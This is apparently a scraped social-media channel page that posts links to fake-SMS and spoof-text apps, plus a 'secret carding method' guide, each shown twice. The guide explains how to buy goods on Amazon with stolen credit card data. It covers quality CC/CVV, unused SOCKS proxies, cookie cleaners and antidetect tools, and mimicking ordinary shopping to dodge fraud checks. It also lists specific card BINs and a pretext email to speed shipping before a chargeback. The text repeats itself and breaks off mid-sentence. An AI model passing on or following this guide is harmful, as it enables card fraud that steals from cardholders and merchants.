WhatsApp Messenger: More than 1 billion people in over 180 countries use WhatsApp to stay in touch with friends and family, anytime and anywhere. WhatsApp is free and offers simple, secure, reliable messaging and calling, available on phones all over theβ¦
UNDERCODE COMMUNITY
Photo
ββββ-undercOdeβββββ
π¦TOP APPS FOR FAKE SMS ALERTS
IOS // ANDROID:
(Facebook.com/UnderCodeTestingCompanie)
π¦BEST FOR IOS FAKE MESSAGE:
> https://apps.apple.com/us/app/fake-text/id1437741191
>https://apps.apple.com/us/app/fake-text-me/id1366931611
>https://apps.apple.com/us/app/fake-sms/id512174468
>https://apps.apple.com/ru/app/hushed-2nd-phone-number/id600520752?l=en
>https://itunes.apple.com/ru/app/fake-conversation-text-messages/id566978141?l=en&mt=8
>https://apps.apple.com/cn/app/best-fake-caller-sms-mms/id418374074?l=en
> https://apps.apple.com/in/app/fake-message-make-prank-message-spoof-sms-prank-conversation/id1140117035
>https://apps.apple.com/gb/app/new-message-notification-prank/id1303481715
> https://apps.apple.com/ch/app/best-fake-caller-free/id435154411
> https://apps.apple.com/jp/app/new-text-tones/id464955043?l=en
>https://apps.apple.com/jp/app/smiley-private-texting-sms/id883312358?l=en
π¦FOR ANDROID :
>https://m.apkpure.com/fake-alert-maker/com.bfrontier.android.alertmaker
>https://m.apkpure.com/fake-text-message/com.neurondigital.FakeTextMessage
>https://play.google.com/store/apps/details?id=com.neurondigital.FakeTextMessage&hl=en
BEST APPS TESTED BY UNDERCODE
@ Steave(t.m.)
βββββUNDERCODEβββββ-
π¦TOP APPS FOR FAKE SMS ALERTS
IOS // ANDROID:
(Facebook.com/UnderCodeTestingCompanie)
π¦BEST FOR IOS FAKE MESSAGE:
> https://apps.apple.com/us/app/fake-text/id1437741191
>https://apps.apple.com/us/app/fake-text-me/id1366931611
>https://apps.apple.com/us/app/fake-sms/id512174468
>https://apps.apple.com/ru/app/hushed-2nd-phone-number/id600520752?l=en
>https://itunes.apple.com/ru/app/fake-conversation-text-messages/id566978141?l=en&mt=8
>https://apps.apple.com/cn/app/best-fake-caller-sms-mms/id418374074?l=en
> https://apps.apple.com/in/app/fake-message-make-prank-message-spoof-sms-prank-conversation/id1140117035
>https://apps.apple.com/gb/app/new-message-notification-prank/id1303481715
> https://apps.apple.com/ch/app/best-fake-caller-free/id435154411
> https://apps.apple.com/jp/app/new-text-tones/id464955043?l=en
>https://apps.apple.com/jp/app/smiley-private-texting-sms/id883312358?l=en
π¦FOR ANDROID :
>https://m.apkpure.com/fake-alert-maker/com.bfrontier.android.alertmaker
>https://m.apkpure.com/fake-text-message/com.neurondigital.FakeTextMessage
>https://play.google.com/store/apps/details?id=com.neurondigital.FakeTextMessage&hl=en
BEST APPS TESTED BY UNDERCODE
@ Steave(t.m.)
βββββUNDERCODEβββββ-
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
ββββββundercOdeββββββ
π¦SECRET CARDING Methode Not patched β οΈβ οΈβ οΈβ οΈβ οΈ
(Follow us instagram.com/UnderCodeTestingCompany)
π¦Amazon Carding New 2k18
March method
Fresh and New and Highly working Method created by top
carders in world.
Note: All other methods are patched...
This is the only working and didnβt patched method...
For sellers and teacher:
Price is too high. Donβt sell it for low prices otherwise this
method gets patchedβ¦
How to Card Amazon β₯
Things you will need:
Quality CC/CVV to an address, full name, phone number, zip code, city, and
state (donβt get junk cards pay good money for good cards)
Socks 4/5 to the state and if you can the city since that would be perfect. This
sock must have never been used before so donβt be cheap and get a quality
sock. Socks are just as important as quality cards!
You will need programs to cleanup cookies and other flagging shit. Get
CCleaner- get the free version it has everything you need. Get the flash cookie
cleaner- it is free as well
Antidetect 7 or Fraudfox VM: These are not needed but they really increase
your carding success to almost 100% if used correctly and setup properly which
both are not very hard to do.
A drop address or if youβre carding digital items you donβt need that.
OK now letβs card
-------------------------
π¦---------------------------------
You just need a Diners Club international cc, Indian NON-VBV
or AMEX, Some Amex are still working
Iβm listing some bins here which will work on Amazon.
542034542034 IN MASTERCARD CREDIT BANK OF INDIA
542086 IN MASTERCARD CREDIT ANDHRA BANK
376900 IN AMEX CREDIT AMERICAN EXPRESS
376901 IN AMEX CREDIT AMERICAN EXPRESS
376902 IN AMEX CREDIT AMERI EXPRESS
376903 IN AMEX CREDIT AMERI EXPRESS
#All are Non-VBV
First Method (Most successful)
Restart the computer and make sure you have used ccleaner and flash cookie
cleaner and they are running. Used disk cleanup in windows as well.
Create a new account on Amazon using a fresh good socks. Modern protection
against carding tracks the user's behavior on the site. Therefore, you must act as
a typical buyer, not jump directly to your product. Use the search, see different
knick-knacks, add them to the cart, but do not buy. It should be quite different
items, not those that you want to card.
After the virtual shopping logout from Amazon, leave the computer, and stop
the activity on it. Put it to sleep. After 5 or more hours, go back to Amazon and
clean your cart. Now letβs card.
Now find the items falling into the limit of your card somewhere between $30
and $150. Using a credit card, pay for the goods that you selected. You may need
to wait for amazon to approve your order or not. Sometimes itβs random I swear.
Now the order should have been accepted and shipped. If not, then you either
have a shitty card worth less than what you trying to card or you threw a flag. Go
back and check your setup. This is pretty full proof way to card amazon. If
everything is in place and you have your bases covered, you should be in and
out. Make sure you check to see if you IP leaking cause that would throw a flag
as well: https://www.dnsleaktest.com
Now we can also speed up this order if itβs in processing just so it doesnβt get
charged back and flagged before it gets shipped. Send amazon an email from
the email that you created for this account. Gmail is preferred email for this setup
as it is much more trustworthy do to its security signed up measures. Use an
excuse to make them speed it up. There is excuse kind of tie into what you are
buying. So letβs say you want a 800 dollar cannon camera then tell them that you
itβs real person on the other end so make your excuse real and donβt go too in
depth.
Now they may ask to call you on the phone number associated with the CC
account. This happens maybe 30% of the time. Just say OK and hope no one
picks up the phone on the other end and luck I on your side. If they send you
π¦SECRET CARDING Methode Not patched β οΈβ οΈβ οΈβ οΈβ οΈ
(Follow us instagram.com/UnderCodeTestingCompany)
π¦Amazon Carding New 2k18
March method
Fresh and New and Highly working Method created by top
carders in world.
Note: All other methods are patched...
This is the only working and didnβt patched method...
For sellers and teacher:
Price is too high. Donβt sell it for low prices otherwise this
method gets patchedβ¦
How to Card Amazon β₯
Things you will need:
Quality CC/CVV to an address, full name, phone number, zip code, city, and
state (donβt get junk cards pay good money for good cards)
Socks 4/5 to the state and if you can the city since that would be perfect. This
sock must have never been used before so donβt be cheap and get a quality
sock. Socks are just as important as quality cards!
You will need programs to cleanup cookies and other flagging shit. Get
CCleaner- get the free version it has everything you need. Get the flash cookie
cleaner- it is free as well
Antidetect 7 or Fraudfox VM: These are not needed but they really increase
your carding success to almost 100% if used correctly and setup properly which
both are not very hard to do.
A drop address or if youβre carding digital items you donβt need that.
OK now letβs card
-------------------------
π¦---------------------------------
You just need a Diners Club international cc, Indian NON-VBV
or AMEX, Some Amex are still working
Iβm listing some bins here which will work on Amazon.
542034542034 IN MASTERCARD CREDIT BANK OF INDIA
542086 IN MASTERCARD CREDIT ANDHRA BANK
376900 IN AMEX CREDIT AMERICAN EXPRESS
376901 IN AMEX CREDIT AMERICAN EXPRESS
376902 IN AMEX CREDIT AMERI EXPRESS
376903 IN AMEX CREDIT AMERI EXPRESS
#All are Non-VBV
First Method (Most successful)
Restart the computer and make sure you have used ccleaner and flash cookie
cleaner and they are running. Used disk cleanup in windows as well.
Create a new account on Amazon using a fresh good socks. Modern protection
against carding tracks the user's behavior on the site. Therefore, you must act as
a typical buyer, not jump directly to your product. Use the search, see different
knick-knacks, add them to the cart, but do not buy. It should be quite different
items, not those that you want to card.
After the virtual shopping logout from Amazon, leave the computer, and stop
the activity on it. Put it to sleep. After 5 or more hours, go back to Amazon and
clean your cart. Now letβs card.
Now find the items falling into the limit of your card somewhere between $30
and $150. Using a credit card, pay for the goods that you selected. You may need
to wait for amazon to approve your order or not. Sometimes itβs random I swear.
Now the order should have been accepted and shipped. If not, then you either
have a shitty card worth less than what you trying to card or you threw a flag. Go
back and check your setup. This is pretty full proof way to card amazon. If
everything is in place and you have your bases covered, you should be in and
out. Make sure you check to see if you IP leaking cause that would throw a flag
as well: https://www.dnsleaktest.com
Now we can also speed up this order if itβs in processing just so it doesnβt get
charged back and flagged before it gets shipped. Send amazon an email from
the email that you created for this account. Gmail is preferred email for this setup
as it is much more trustworthy do to its security signed up measures. Use an
excuse to make them speed it up. There is excuse kind of tie into what you are
buying. So letβs say you want a 800 dollar cannon camera then tell them that you
itβs real person on the other end so make your excuse real and donβt go too in
depth.
Now they may ask to call you on the phone number associated with the CC
account. This happens maybe 30% of the time. Just say OK and hope no one
picks up the phone on the other end and luck I on your side. If they send you
Instagram
Login β’ Instagram
Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.